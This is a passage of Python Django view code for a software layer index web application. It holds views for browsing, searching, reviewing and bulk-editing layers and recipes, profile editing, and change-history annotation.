    did it, then redirect to the layer's page."""
    layer = get_object_or_404(LayerItem, name=name)
    if layer.comparison:
        raise Http404
    if layer.status != newstatus:
        layer.change_status(newstatus, request.user.username)
        layer.save()
    return HttpResponseRedirect(layer.get_absolute_url())
class RedirectParamsView(RedirectView):
    """RedirectView variant whose target is a named URL pattern.

    The URL conf supplies 'redirect_name' as a keyword argument; all
    remaining args/kwargs are forwarded to the named pattern.
    """
    def get_redirect_url(self, *args, **kwargs):
        target_name = kwargs.pop('redirect_name')
        return reverse_lazy(target_name, args=args, kwargs=kwargs)
class LayerListView(ListView):
    """Listing of published ('P') and no-update ('X') layers for a branch."""
    context_object_name = 'layerbranch_list'
    def get_queryset(self):
        # 404s on unknown or non-browsable branches before querying.
        _check_url_branch(self.kwargs)
        return LayerBranch.objects.filter(branch__name=self.kwargs['branch']).filter(layer__status__in=['P', 'X']).order_by('layer__layer_type', '-layer__index_preference', 'layer__name')
    def get_context_data(self, **kwargs):
        context = super(LayerListView, self).get_context_data(**kwargs)
        context['url_branch'] = self.kwargs['branch']
        context['this_url_name'] = resolve(self.request.path_info).url_name
        context['layer_type_choices'] = LayerItem.LAYER_TYPE_CHOICES
        return context
class LayerReviewListView(ListView):
    """List of new (status 'N') layers awaiting review; reviewers only."""

    @method_decorator(login_required)
    def dispatch(self, request, *args, **kwargs):
        # Reviewing requires the publish permission
        if not request.user.has_perm('layerindex.publish_layer'):
            raise PermissionDenied
        return super(LayerReviewListView, self).dispatch(request, *args, **kwargs)

    def get_queryset(self):
        pending = LayerBranch.objects.filter(branch__name='master', layer__status='N')
        return pending.order_by('layer__name')
class LayerDetailView(DetailView):
    """Detail page for a layer on a particular branch.

    Comparison layers are hidden (404) and unpublished ('N') layers are
    only visible to users with the publish permission.
    """
    model = LayerItem
    slug_field = 'name'
    # This is a bit of a mess. Surely there has to be a better way to handle this...
    def dispatch(self, request, *args, **kwargs):
        """Run the normal dispatch, then enforce visibility on the result."""
        self.user = request.user
        res = super(LayerDetailView, self).dispatch(request, *args, **kwargs)
        l = self.get_object()
        if l:
            # Comparison ("classic") layers are not shown through this view
            if l.comparison:
                raise Http404
            # Unpublished layers are visible only to users who can publish them
            if l.status == 'N':
                if not (request.user.is_authenticated() and request.user.has_perm('layerindex.publish_layer')):
                    raise PermissionDenied
        return res
    def get_context_data(self, **kwargs):
        """Assemble layer/branch details plus related machines, distros, appends, classes and update history."""
        _check_url_branch(self.kwargs)
        context = super(LayerDetailView, self).get_context_data(**kwargs)
        layer = context['layeritem']
        context['useredit'] = layer.user_can_edit(self.user)
        layerbranch = layer.get_layerbranch(self.kwargs['branch'])
        if layerbranch:
            context['layerbranch'] = layerbranch
            context['machines'] = layerbranch.machine_set.order_by('name')
            context['distros'] = layerbranch.distro_set.order_by('name')
            context['appends'] = layerbranch.bbappend_set.order_by('filename')
            context['classes'] = layerbranch.bbclass_set.order_by('name')
            context['updates'] = LayerUpdate.objects.filter(layer=layerbranch.layer, branch=layerbranch.branch).order_by('-started')
        context['url_branch'] = self.kwargs['branch']
        context['this_url_name'] = resolve(self.request.path_info).url_name
        if 'rrs' in settings.INSTALLED_APPS:
            # Imported here because the rrs app is optional
            from rrs.models import MaintenancePlanLayerBranch
            # We don't care about branch, only that the layer is included
            context['rrs_maintplans'] = [m.plan for m in MaintenancePlanLayerBranch.objects.filter(layerbranch__layer=layer)]
        return context
class LayerReviewDetailView(LayerDetailView):
    """Layer detail page as seen by a reviewer; always shows master."""

    @method_decorator(login_required)
    def dispatch(self, request, *args, **kwargs):
        if not request.user.has_perm('layerindex.publish_layer'):
            raise PermissionDenied
        return super(LayerReviewDetailView, self).dispatch(request, *args, **kwargs)

    def get_context_data(self, **kwargs):
        # Reviews are only ever carried out against the master branch
        self.kwargs['branch'] = 'master'
        return super(LayerReviewDetailView, self).get_context_data(**kwargs)
def recipes_preferred_count(qs):
    """Annotate a Recipe queryset with a ``preferred_count`` column.

    ``preferred_count`` is the number of recipes with the same pn, on the
    same branch, in a different software/application ('S'/'A') layer with a
    higher index preference — a non-zero value means this row is a
    "duplicate" that templates can de-emphasise.
    """
    # Add extra column so we can show "duplicate" recipes from other layers de-emphasised
    # (it's a bit crude having to do this using SQL but I couldn't find a better way...)
    return qs.extra(
        select={
            'preferred_count': """SELECT COUNT(1)
FROM layerindex_recipe AS recipe2
    , layerindex_layerbranch as branch2
    , layerindex_layeritem as layer1
    , layerindex_layeritem as layer2
WHERE branch2.id = recipe2.layerbranch_id
    AND layer2.id = branch2.layer_id
    AND layer2.layer_type in ('S', 'A')
    AND branch2.branch_id = layerindex_layerbranch.branch_id
    AND recipe2.pn = layerindex_recipe.pn
    AND recipe2.layerbranch_id <> layerindex_recipe.layerbranch_id
    AND layer1.id = layerindex_layerbranch.layer_id
    AND layer2.index_preference > layer1.index_preference
"""
        },
    )
class RecipeSearchView(ListView):
    """Keyword search over recipes on one branch.

    Supports 'inherits:', 'depends:' and 'layer:' prefixes in the query
    string; a single exact result redirects straight to the recipe page.
    """
    context_object_name = 'recipe_list'
    paginate_by = 50
    def render_to_response(self, context, **kwargs):
        # A single match goes straight to the recipe detail page
        if len(self.object_list) == 1:
            return HttpResponseRedirect(reverse('recipe', args=(self.object_list[0].id,)))
        else:
            return super(ListView, self).render_to_response(context, **kwargs)
    def search_recipe_query(self, init_qs, query_string, preferred=True):
        """Do a prioritised search using the specified keyword (if any)"""
        # Lower() here isn't needed for OE recipes since we don't use uppercase
        # but we use this same code for "recipes" from other distros where
        # they do
        order_by = (Lower('pn'), 'layerbranch__layer')
        filtered = False
        if query_string.strip():
            # First search by exact name
            qs0 = init_qs.filter(pn=query_string).order_by(*order_by)
            if preferred:
                qs0 = recipes_preferred_count(qs0)
            # Then keyword somewhere in the name
            entry_query = utils.string_to_query(query_string, ['pn'])
            qs1 = init_qs.filter(entry_query).order_by(*order_by)
            if preferred:
                qs1 = recipes_preferred_count(qs1)
            # Then keyword somewhere in summary or description
            entry_query = utils.string_to_query(query_string, ['description', 'summary'])
            qs2 = init_qs.filter(entry_query).order_by(*order_by)
            if preferred:
                qs2 = recipes_preferred_count(qs2)
            # Now chain the results together and drop any duplicates (e.g.
            # if the keyword matched in the name and summary)
            qs = list(utils.chain_unique(qs0, qs1, qs2))
            filtered = True
        elif 'q' in self.request.GET:
            # User clicked search with no query string, return all records
            qs = init_qs.order_by(*order_by)
            if preferred:
                qs = list(recipes_preferred_count(qs))
        else:
            # It's a bit too slow to return all records by default, and most people
            # won't actually want that (if they do they can just hit the search button
            # with no query string)
            qs = Recipe.objects.none()
        return qs, filtered
    def get_queryset(self):
        """Parse prefix filters out of the query string, then run the keyword search."""
        _check_url_branch(self.kwargs)
        query_string = self.request.GET.get('q', '')
        init_qs = Recipe.objects.filter(layerbranch__branch__name=self.kwargs['branch'])
        # Support slightly crude search on inherits field
        query_items = query_string.split()
        inherits = []
        query_terms = []
        for item in query_items:
            if item.startswith('inherits:'):
                inherits.append(item.split(':')[1])
            # support searches by build dependencies
            elif item.startswith('depends:'):
                depsearch = item.split(':')[1]
                # Start from an always-false Q and OR in any matches
                qobj = Q(pk__in=[])
                static_build_dependencies = StaticBuildDep.objects.filter(name=depsearch).first()
                dynamic_build_dependencies = DynamicBuildDep.objects.filter(name=depsearch).first()
                if static_build_dependencies:
                    qobj |= Q(staticbuilddep=static_build_dependencies)
                if dynamic_build_dependencies:
                    qobj |= Q(dynamicbuilddep=dynamic_build_dependencies)
                init_qs = init_qs.filter(qobj).distinct()
            # support searches by layer name
            elif item.startswith('layer:'):
                query_layername = item.split(':')[1].strip().lower()
                if not query_layername:
                    messages.add_message(self.request, messages.ERROR, 'The \
layer name is expected to follow the \"layer:\" prefix without any spaces.')
                else:
                    query_layer = LayerItem.objects.filter(
                        name=query_layername)
                    if query_layer:
                        init_qs = init_qs.filter(
                            layerbranch__layer=query_layer[0])
                    else:
                        messages.add_message(self.request, messages.ERROR,
                                             'No layer \"%s\" was found.'
                                             % query_layername)
            else:
                # Not a recognised prefix: part of the plain keyword search
                query_terms.append(item)
        if inherits:
            # FIXME This is a bit ugly, perhaps we should consider having this as a one-many relationship instead
            for inherit in inherits:
                init_qs = init_qs.filter(Q(inherits=inherit) | Q(inherits__startswith=inherit + ' ') | Q(inherits__endswith=' ' + inherit) | Q(inherits__contains=' %s ' % inherit))
        query_string = ' '.join(query_terms)
        qs, _ = self.search_recipe_query(init_qs, query_string, preferred=False)
        return qs
    def get_context_data(self, **kwargs):
        context = super(RecipeSearchView, self).get_context_data(**kwargs)
        searchval = self.request.GET.get('q', '')
        context['search_keyword'] = searchval
        context['url_branch'] = self.kwargs['branch']
        context['this_url_name'] = resolve(self.request.path_info).url_name
        if searchval:
            # Preserve the query across pagination links
            context['extra_url_param'] = '?q=%s' % searchval
        return context
class DuplicatesView(TemplateView):
    """Report recipes, classes and include files duplicated across layers."""

    def get_recipes(self, layer_ids):
        """Recipes whose pn occurs in more than one layer on this branch."""
        base = Recipe.objects.filter(layerbranch__branch__name=self.kwargs['branch'])
        if layer_ids:
            base = base.filter(layerbranch__layer__in=layer_ids)
        dupes = base.values('pn').annotate(Count('layerbranch', distinct=True)).filter(layerbranch__count__gt=1)
        dupe_names = [entry['pn'] for entry in dupes]
        result = base.all().filter(pn__in=dupe_names).order_by('pn', 'layerbranch__layer', '-pv')
        # Annotate so templates can de-emphasise lower-preference duplicates
        return recipes_preferred_count(result)

    def get_classes(self, layer_ids):
        """Classes whose name occurs in more than one layer on this branch."""
        base = BBClass.objects.filter(layerbranch__branch__name=self.kwargs['branch'])
        if layer_ids:
            base = base.filter(layerbranch__layer__in=layer_ids)
        dupes = base.values('name').annotate(Count('layerbranch', distinct=True)).filter(layerbranch__count__gt=1)
        dupe_names = [entry['name'] for entry in dupes]
        return base.all().filter(name__in=dupe_names).order_by('name', 'layerbranch__layer')

    def get_incfiles(self, layer_ids):
        """Include files whose path occurs in more than one layer on this branch."""
        base = IncFile.objects.filter(layerbranch__branch__name=self.kwargs['branch'])
        if layer_ids:
            base = base.filter(layerbranch__layer__in=layer_ids)
        dupes = base.values('path').annotate(Count('layerbranch', distinct=True)).filter(layerbranch__count__gt=1)
        dupe_paths = [entry['path'] for entry in dupes]
        return base.all().filter(path__in=dupe_paths).order_by('path', 'layerbranch__layer')

    def get_context_data(self, **kwargs):
        selected = [int(i) for i in self.request.GET.getlist('l')]
        ctx = super(DuplicatesView, self).get_context_data(**kwargs)
        ctx['recipes'] = self.get_recipes(selected)
        ctx['classes'] = self.get_classes(selected)
        ctx['incfiles'] = self.get_incfiles(selected)
        ctx['url_branch'] = self.kwargs['branch']
        ctx['this_url_name'] = resolve(self.request.path_info).url_name
        ctx['layers'] = LayerBranch.objects.filter(branch__name=self.kwargs['branch']).filter(layer__status__in=['P', 'X']).order_by('layer__name')
        ctx['showlayers'] = selected
        return ctx
class AdvancedRecipeSearchView(ListView):
    """Field-based recipe search (master branch only).

    GET parameters: ``field`` (model field to match), ``match_type``
    ('C' contains, 'N' does not contain, 'B' blank; anything else matches
    exactly), ``value`` (text to match) and optional ``layer`` (layer id).
    """
    context_object_name = 'recipe_list'
    paginate_by = 50
    def get_queryset(self):
        field = self.request.GET.get('field', '')
        if field:
            search_form = AdvancedRecipeSearchForm(self.request.GET)
            if not search_form.is_valid():
                return Recipe.objects.none()
            match_type = self.request.GET.get('match_type', '')
            if match_type == 'B':
                # "Blank" match: any supplied value is ignored
                value = ''
            else:
                value = self.request.GET.get('value', '')
            if value or match_type == 'B':
                if match_type == 'C' or match_type == 'N':
                    # Substring match (negated later for 'N')
                    query = Q(**{"%s__icontains" % field: value})
                else:
                    query = Q(**{"%s" % field: value})
                queryset = Recipe.objects.filter(layerbranch__branch__name='master')
                layer = self.request.GET.get('layer', '')
                if layer:
                    queryset = queryset.filter(layerbranch__layer=layer)
                if match_type == 'N':
                    # Exclude blank as well
                    queryset = queryset.exclude(Q(**{"%s" % field: ''})).exclude(query)
                else:
                    queryset = queryset.filter(query)
                return queryset.order_by('pn', 'layerbranch__layer')
        return Recipe.objects.none()
    def get_context_data(self, **kwargs):
        context = super(AdvancedRecipeSearchView, self).get_context_data(**kwargs)
        # Presence of 'field' indicates a search was actually submitted
        if self.request.GET.get('field', ''):
            searched = True
            search_form = AdvancedRecipeSearchForm(self.request.GET)
        else:
            searched = False
            search_form = AdvancedRecipeSearchForm()
        context['search_form'] = search_form
        context['searched'] = searched
        return context
class BulkChangeView(CreateView):
    """Create a new recipe changeset for bulk editing."""
    model = RecipeChangeset
    form_class = RecipeChangesetForm

    @method_decorator(login_required)
    def dispatch(self, request, *args, **kwargs):
        return super(BulkChangeView, self).dispatch(request, *args, **kwargs)

    def form_valid(self, form):
        if not self.request.user.is_authenticated():
            raise PermissionDenied
        # Attach the current user as owner before saving
        changeset = form.save(commit=False)
        changeset.user = self.request.user
        changeset.save()
        return HttpResponseRedirect(reverse('bulk_change_search', args=(changeset.id,)))

    def get_context_data(self, **kwargs):
        ctx = super(BulkChangeView, self).get_context_data(**kwargs)
        # Show the user's existing changesets alongside the creation form
        ctx['changesets'] = RecipeChangeset.objects.filter(user=self.request.user)
        return ctx
class BulkChangeSearchView(AdvancedRecipeSearchView):
    """Recipe search used to populate a bulk-change changeset.

    GET performs the search; POST adds selected (or all) results to the
    changeset, or clears it, then re-renders the search results.
    """
    def get(self, request, *args, **kwargs):
        self.changeset = get_object_or_404(RecipeChangeset, pk=kwargs['pk'])
        # Changesets are private to their creator
        if self.changeset.user != request.user:
            raise PermissionDenied
        return super(BulkChangeSearchView, self).get(request, *args, **kwargs)
    def post(self, request, *args, **kwargs):
        if not request.user.is_authenticated():
            raise PermissionDenied
        changeset = get_object_or_404(RecipeChangeset, pk=kwargs['pk'])
        if changeset.user != request.user:
            raise PermissionDenied
        def add_recipes(recipes):
            # Add each recipe to the changeset unless it is already in it
            for recipe in recipes:
                if not changeset.recipechange_set.filter(recipe=recipe):
                    change = RecipeChange()
                    change.changeset = changeset
                    change.recipe = recipe
                    change.reset_fields()
                    change.save()
        if 'add_selected' in request.POST:
            id_list = request.POST.getlist('selecteditems')
            # Drop anything that is not a plain integer id
            id_list = [int(i) for i in id_list if i.isdigit()]
            recipes = Recipe.objects.filter(id__in=id_list)
            add_recipes(recipes)
        elif 'add_all' in request.POST:
            add_recipes(self.get_queryset())
        elif 'remove_all' in request.POST:
            changeset.recipechange_set.all().delete()
        # Re-render the same search results after modifying the changeset
        return self.get(request, *args, **kwargs)
    def get_context_data(self, **kwargs):
        context = super(BulkChangeSearchView, self).get_context_data(**kwargs)
        context['changeset'] = self.changeset
        context['current_branch'] = 'master'
        return context
class BaseDeleteView(DeleteView):
    """DeleteView with shared context: object type name and optional cancel URL.

    A ``?cancel=<urlname>`` query parameter supplies the pattern name used
    to build a cancel link back to the object.
    """

    def get_context_data(self, **kwargs):
        ctx = super(BaseDeleteView, self).get_context_data(**kwargs)
        obj = ctx.get('object', None)
        if obj:
            ctx['object_type'] = obj._meta.verbose_name
            cancel_name = self.request.GET.get('cancel', '')
            if cancel_name:
                ctx['cancel_url'] = reverse_lazy(cancel_name, args=(obj.pk,))
        return ctx
class BulkChangeDeleteView(BaseDeleteView):
    """Delete a recipe changeset; restricted to the owning user."""
    model = RecipeChangeset
    success_url = reverse_lazy('bulk_change')

    def get_queryset(self):
        base = super(BulkChangeDeleteView, self).get_queryset()
        # Users may only delete their own changesets
        return base.filter(user=self.request.user)
class MachineSearchView(ListView):
    """Keyword search over machines for one branch."""
    context_object_name = 'machine_list'
    paginate_by = 50

    def get_queryset(self):
        _check_url_branch(self.kwargs)
        # Only honour q when the search button was actually used
        if self.request.GET.get('search', ''):
            keyword = self.request.GET.get('q', '')
        else:
            keyword = ''
        branch_machines = Machine.objects.filter(layerbranch__branch__name=self.kwargs['branch'])
        if keyword.strip():
            match = utils.string_to_query(keyword, ['name', 'description'])
            return branch_machines.filter(match).order_by('name', 'layerbranch__layer')
        if 'q' in self.request.GET:
            # Explicit empty search: show everything
            return branch_machines.order_by('name', 'layerbranch__layer')
        # Be consistent with RecipeSearchView
        return Machine.objects.none()

    def get_context_data(self, **kwargs):
        ctx = super(MachineSearchView, self).get_context_data(**kwargs)
        ctx['search_keyword'] = self.request.GET.get('q', '')
        ctx['url_branch'] = self.kwargs['branch']
        ctx['this_url_name'] = resolve(self.request.path_info).url_name
        return ctx
class UpdateListView(ListView):
    """All index update runs, newest first."""
    context_object_name = "updates"
    paginate_by = 50

    def get_queryset(self):
        return Update.objects.order_by('-started')
class UpdateDetailView(DetailView):
    """One update run together with its per-layer sub-updates."""
    model = Update

    def get_context_data(self, **kwargs):
        ctx = super(UpdateDetailView, self).get_context_data(**kwargs)
        update = self.get_object()
        if update:
            ctx['layerupdates'] = update.layerupdate_set.order_by('-started')
        return ctx
class LayerUpdateDetailView(DetailView):
    """Detail page for a single LayerUpdate (one layer within an update run)."""
    model = LayerUpdate
class DistroSearchView(ListView):
    """Keyword search over distros for one branch."""
    context_object_name = 'distro_list'
    paginate_by = 50

    def get_queryset(self):
        _check_url_branch(self.kwargs)
        # Only honour q when the search button was actually used
        if self.request.GET.get('search', ''):
            keyword = self.request.GET.get('q', '')
        else:
            keyword = ''
        branch_distros = Distro.objects.filter(layerbranch__branch__name=self.kwargs['branch'])
        if keyword.strip():
            match = utils.string_to_query(keyword, ['name', 'description'])
            return branch_distros.filter(match).order_by('name', 'layerbranch__layer')
        if 'q' in self.request.GET:
            # Explicit empty search: show everything
            return branch_distros.order_by('name', 'layerbranch__layer')
        # Be consistent with RecipeSearchView
        return Distro.objects.none()

    def get_context_data(self, **kwargs):
        ctx = super(DistroSearchView, self).get_context_data(**kwargs)
        ctx['search_keyword'] = self.request.GET.get('q', '')
        ctx['url_branch'] = self.kwargs['branch']
        ctx['this_url_name'] = resolve(self.request.path_info).url_name
        return ctx
class ClassSearchView(ListView):
    """Keyword search over bbclasses for one branch."""
    context_object_name = 'class_list'
    paginate_by = 50

    def get_queryset(self):
        _check_url_branch(self.kwargs)
        # Only honour q when the search button was actually used
        if self.request.GET.get('search', ''):
            keyword = self.request.GET.get('q', '')
        else:
            keyword = ''
        branch_classes = BBClass.objects.filter(layerbranch__branch__name=self.kwargs['branch'])
        if keyword.strip():
            match = utils.string_to_query(keyword, ['name'])
            return branch_classes.filter(match).order_by('name', 'layerbranch__layer')
        if 'q' in self.request.GET:
            # Explicit empty search: show everything
            return branch_classes.order_by('name', 'layerbranch__layer')
        # Be consistent with RecipeSearchView
        return BBClass.objects.none()

    def get_context_data(self, **kwargs):
        ctx = super(ClassSearchView, self).get_context_data(**kwargs)
        ctx['search_keyword'] = self.request.GET.get('q', '')
        ctx['url_branch'] = self.kwargs['branch']
        ctx['this_url_name'] = resolve(self.request.path_info).url_name
        return ctx
class HistoryListView(ListView):
    """Change-history (reversion revision) listing, newest first."""
    context_object_name = "revisions"
    paginate_by = 50

    def get_queryset(self):
        return Revision.objects.order_by('-date_created')
class EditProfileFormView(SuccessMessageMixin, UpdateView):
    """Let the logged-in user edit their own profile.

    Special handling on save:
    * changed security answers are normalised and re-hashed,
    * a changed email address deactivates the account and re-runs
      registration so the new address gets verified,
    * captcha errors mask other field errors to hinder user enumeration.
    """
    form_class = EditProfileForm
    @method_decorator(never_cache)
    def dispatch(self, request, *args, **kwargs):
        self.user = request.user
        return super(EditProfileFormView, self).dispatch(request, *args, **kwargs)
    def get_context_data(self, **kwargs):
        context = super(EditProfileFormView, self).get_context_data(**kwargs)
        form = context['form']
        # Prepare a list of fields with errors
        # We do this so that if there's a problem with the captcha, that's the only error shown
        # (since we have a username field, we want to make user enumeration difficult)
        if 'captcha' in form.errors:
            error_fields = ['captcha']
        else:
            error_fields = form.errors.keys()
        context['error_fields'] = error_fields
        context['return_url'] = self.get_success_url()
        return context
    def get_object(self, queryset=None):
        # Users may only ever edit their own profile
        return self.user
    def form_valid(self, form):
        """Persist the profile and handle security-answer / email changes."""
        self.object = form.save()
        # Fixed missing space after "if" (was: if'answer_1')
        if 'answer_1' in form.changed_data:
            # If one security answer has changed, they all have. Delete current questions and add new ones.
            # Don't throw an error if we are editing the super user and they don't have security questions yet.
            try:
                self.user.userprofile.securityquestionanswer_set.all().delete()
                user = self.user.userprofile
            except UserProfile.DoesNotExist:
                user = UserProfile.objects.create(user=self.user)
            security_question_1 = SecurityQuestion.objects.get(question=form.cleaned_data.get("security_question_1"))
            security_question_2 = SecurityQuestion.objects.get(question=form.cleaned_data.get("security_question_2"))
            security_question_3 = SecurityQuestion.objects.get(question=form.cleaned_data.get("security_question_3"))
            # Normalise answers (strip spaces, lower-case) before hashing
            answer_1 = form.cleaned_data.get("answer_1").replace(" ", "").lower()
            answer_2 = form.cleaned_data.get("answer_2").replace(" ", "").lower()
            answer_3 = form.cleaned_data.get("answer_3").replace(" ", "").lower()
            # Answers are hashed using Django's password hashing function make_password()
            SecurityQuestionAnswer.objects.create(user=user, security_question=security_question_1,
                                                  answer=make_password(answer_1))
            SecurityQuestionAnswer.objects.create(user=user, security_question=security_question_2,
                                                  answer=make_password(answer_2))
            SecurityQuestionAnswer.objects.create(user=user, security_question=security_question_3,
                                                  answer=make_password(answer_3))
        if 'email' in form.changed_data:
            # Take a copy of request.user as it is about to be invalidated by logout()
            user = self.request.user
            logout(self.request)
            # Deactivate user and put through registration again
            user.is_active = False
            user.save()
            view = RegistrationView()
            view.request = self.request
            view.send_activation_email(user)
            return HttpResponseRedirect(reverse('reregister'))
        return super(EditProfileFormView, self).form_valid(form)
    def get_success_message(self, cleaned_data):
        return "Profile saved successfully"
    def get_success_url(self):
        # Optional ?return_to= lets callers send the user back where they came from
        return self.request.GET.get('return_to', reverse('frontpage'))
@receiver(pre_save, sender=reversion.models.Version)
def annotate_revision_version(sender, instance, *args, **kwargs):
    """Pre-save hook: build a human-readable change summary for a Version.

    Compares the incoming Version's field_dict against the most recent prior
    Version of the same object and appends "Changed <model> <object>
    <field> to '<value>'" lines to the owning Revision's comment.
    """
    # Fields that change on every fetch and would just create noise
    ignorefields = ['vcs_last_rev', 'vcs_last_fetch', 'vcs_last_commit', 'updated']
    changelist = []
    objclass = instance.content_type.model_class()
    currentVersion = instance.field_dict
    #FIXME modern django-reversion dropped the type field (argh!)
    #if instance.type == reversion.models.VERSION_DELETE:
    #    changelist.append("Deleted %s: %s" % (modelmeta.verbose_name.lower(), instance.object_repr))
    #else:
    pastver = reversion.models.Version.objects.filter(content_type=instance.content_type, object_id=instance.object_id).order_by('-id').first()
    if pastver:# and instance.type != reversion.models.VERSION_ADD:
        pastVersion = pastver.field_dict
        # Set difference of (field, value) pairs yields the changed fields
        changes = set(currentVersion.items()) - set(pastVersion.items())
        changedVars = [var[0] for var in changes]
        fieldchanges = []
        modelmeta = objclass._meta
        for field in changedVars:
            if field not in ignorefields:
                modelfield = modelmeta.get_field(field)
                newvalue = currentVersion[field]
                if modelfield.choices:
                    # Show the human-readable choice label, not the raw value
                    for v in modelfield.choices:
                        if v[0] == newvalue:
                            newvalue = v[1]
                            break
                fieldchanges.append("%s to '%s'" % (modelfield.verbose_name.lower(), newvalue))
        if fieldchanges:
            changelist.append("Changed %s %s %s" % (modelmeta.verbose_name.lower(), instance.object_repr, ", ".join(fieldchanges)))
    if changelist:
        # Replace the placeholder set by annotate_revision(); otherwise append
        if not instance.revision.comment or instance.revision.comment == 'No changes':
            instance.revision.comment = '\n'.join(changelist)
        else:
            instance.revision.comment = instance.revision.comment + '\n' + ('\n'.join(changelist))
        instance.revision.save()
@receiver(pre_save, sender=reversion.models.Revision)
def annotate_revision(sender, instance, *args, **kwargs):
    """Give brand-new Revision rows a placeholder comment.

    When you make changes in the admin site the comment gets set to just
    specify the field that was changed, but that's not enough detail.
    For changes elsewhere it'll be blank since we aren't creating a revision
    explicitly. Thus, set the comment to a default value and we'll fill it
    in ourselves using the Version pre-save signal handler above.
    """
    if instance.pk is not None:
        return
    instance.comment = 'No changes'
class RecipeDetailView(DetailView):
    """Detail page for a recipe, including matching bbappends and related files."""
    model = Recipe
    def get_context_data(self, **kwargs):
        context = super(RecipeDetailView, self).get_context_data(**kwargs)
        recipe = self.get_object()
        if recipe:
            # e.g. foo_1.0.bb -> foo_1.0 -> foo ; escape '+' for the regex below
            verappendprefix = recipe.filename.split('.bb')[0]
            appendprefix = verappendprefix.split('_')[0]
            appendprefix = appendprefix.replace('+', r'\+')
            #context['verappends'] = BBAppend.objects.filter(layerbranch__branch=recipe.layerbranch.branch).filter(filename='%s.bbappend' % verappendprefix)
            context['appends'] = BBAppend.objects.filter(layerbranch__branch=recipe.layerbranch.branch).filter(filename__regex=r'^%s(_[^_]*)?\.bbappend' % appendprefix)
            # Narrow the name-based matches down to appends that actually apply
            verappends = []
            for append in context['appends']:
                if append.matches_recipe(recipe):
                    verappends.append(append)
            context['verappends'] = verappends
            context['packageconfigs'] = recipe.packageconfig_set.order_by('feature')
            context['staticdependencies'] = recipe.staticbuilddep_set.order_by('name')
            # Only .inc file dependencies are presented as "extra files"
            extrafiles = []
            for dep in recipe.recipefiledependency_set.all():
                if dep.path.endswith('.inc'):
                    extrafiles.append(dep)
            context['extrafiles'] = extrafiles
            context['otherbranch_recipes'] = Recipe.objects.filter(layerbranch__layer=recipe.layerbranch.layer, layerbranch__branch__comparison=False, pn=recipe.pn).order_by('layerbranch__branch__sort_priority')
        return context
class LinkWrapper:
    """Iterable proxy around a queryset (or list) that annotates each item.

    Subclasses implement _annotate() to attach extra attributes to every
    object as it is yielded. Supports iteration, indexing/slicing and len()
    so it can stand in for a queryset in generic list views.
    """

    def __init__(self, queryset):
        self.queryset = queryset

    def __iter__(self):
        for entry in self.queryset:
            self._annotate(entry)
            yield entry

    def _slice(self, start, stop, step=1):
        # Annotate lazily while slicing, without materialising everything
        for entry in islice(self.queryset, start, stop, step):
            self._annotate(entry)
            yield entry

    def __getitem__(self, key):
        if not isinstance(key, slice):
            # Single index: take a one-element slice and return its item
            return next(self._slice(key, key + 1))
        return self._slice(key.start, key.stop, key.step)

    def __len__(self):
        if isinstance(self.queryset, QuerySet):
            # Let the database count rather than fetching all rows
            return self.queryset.count()
        return len(self.queryset)
class ClassicRecipeLinkWrapper(LinkWrapper):
    """LinkWrapper annotating ClassicRecipe objects with their covering recipe.

    Attaches ``cover_recipe`` (the covering Recipe or None) and
    ``cover_vercmp`` (-1/0/1 version comparison result, 0 when unknown).
    """
    # This function is required by generic views, create another proxy
    def _clone(self):
        # Fix: the original passed **self.kwargs here, but LinkWrapper never
        # sets such an attribute, so cloning raised AttributeError.
        # LinkWrapper.__init__ only takes the queryset.
        return ClassicRecipeLinkWrapper(self.queryset._clone())
    def _annotate(self, obj):
        recipe = None
        vercmp = 0
        if obj.cover_layerbranch and obj.cover_pn:
            rq = Recipe.objects.filter(layerbranch=obj.cover_layerbranch).filter(pn=obj.cover_pn)
            if rq:
                recipe = rq.first()
                if obj.pv and recipe.pv:
                    obj_ver = parse_version(obj.pv)
                    recipe_ver = parse_version(recipe.pv)
                    # cmp()-style three-way comparison without the removed cmp()
                    vercmp = ((recipe_ver > obj_ver) - (recipe_ver < obj_ver))
        setattr(obj, 'cover_recipe', recipe)
        setattr(obj, 'cover_vercmp', vercmp)
class ClassicRecipeReverseLinkWrapper(LinkWrapper):
    """LinkWrapper annotating Recipe objects with the ClassicRecipe (on the
    comparison branch) that covers them.

    Attaches ``cover_recipe`` (the covering ClassicRecipe or None) and
    ``cover_vercmp`` (-1/0/1 version comparison result, 0 when unknown).
    """
    def __init__(self, queryset, branch, from_branch=None):
        self.queryset = queryset
        self.branch = branch
        self.from_branch = from_branch
    # This function is required by generic views, create another proxy
    def _clone(self):
        # Fix: the original passed **self.kwargs, but no such attribute is
        # ever set, so cloning raised AttributeError. Pass the real
        # constructor arguments instead.
        return ClassicRecipeReverseLinkWrapper(self.queryset._clone(), self.branch, self.from_branch)
    def _annotate(self, obj):
        recipe = None
        vercmp = 0
        # Work out which layerbranch the covering recipe should point back at
        if self.from_branch:
            from_branchobj = LayerBranch.objects.get(layer=obj.layerbranch.layer, branch__name=self.from_branch)
        else:
            from_branchobj = obj.layerbranch
        rq = ClassicRecipe.objects.filter(layerbranch__branch__name=self.branch).filter(cover_layerbranch=from_branchobj).filter(cover_pn=obj.pn)
        if rq:
            recipe = rq.first()
            if obj.pv and recipe.pv:
                obj_ver = parse_version(obj.pv)
                recipe_ver = parse_version(recipe.pv)
                # cmp()-style three-way comparison without the removed cmp()
                vercmp = ((recipe_ver > obj_ver) - (recipe_ver < obj_ver))
        setattr(obj, 'cover_recipe', recipe)
        setattr(obj, 'cover_vercmp', vercmp)
class LayerCheckListView(ListView):
    """All published/no-update layers on a branch, for the layer check page."""
    context_object_name = 'layerbranches'

    def get_queryset(self):
        _check_url_branch(self.kwargs)
        visible = LayerBranch.objects.filter(branch__name=self.kwargs['branch'],
                                             layer__status__in=['P', 'X'])
        return visible.order_by('layer__name')
class BBClassCheckListView(ListView):
    """Classes from the core layer that recipes might inherit, for checking.

    Filters out classes that (per this hand-maintained list's name) are not
    inherited by individual recipes.
    """
    context_object_name = 'classes'
    def get_queryset(self):
        _check_url_branch(self.kwargs)
        # Hand-maintained exclusion list; keep sorted when adding entries
        nonrecipe_classes = ['archiver',
                             'base',
                             'buildhistory',
                             'bugzilla',
                             'buildstats',
                             'buildstats-summary',
                             'ccache',
                             'chrpath',
                             'copyleft_compliance',
                             'copyleft_filter',
                             'cve-check',
                             'debian',
                             'devshell',
                             'devtool-source',
                             'distrodata',
                             'extrausers',
                             'icecc',
                             'image-buildinfo',
                             'image-container',
                             'image-combined-dbg',
                             'image-live',
                             'image-mklibs',
                             'image-prelink',
                             'image_types',
                             'image_types_wic',
                             'insane',
                             'license',
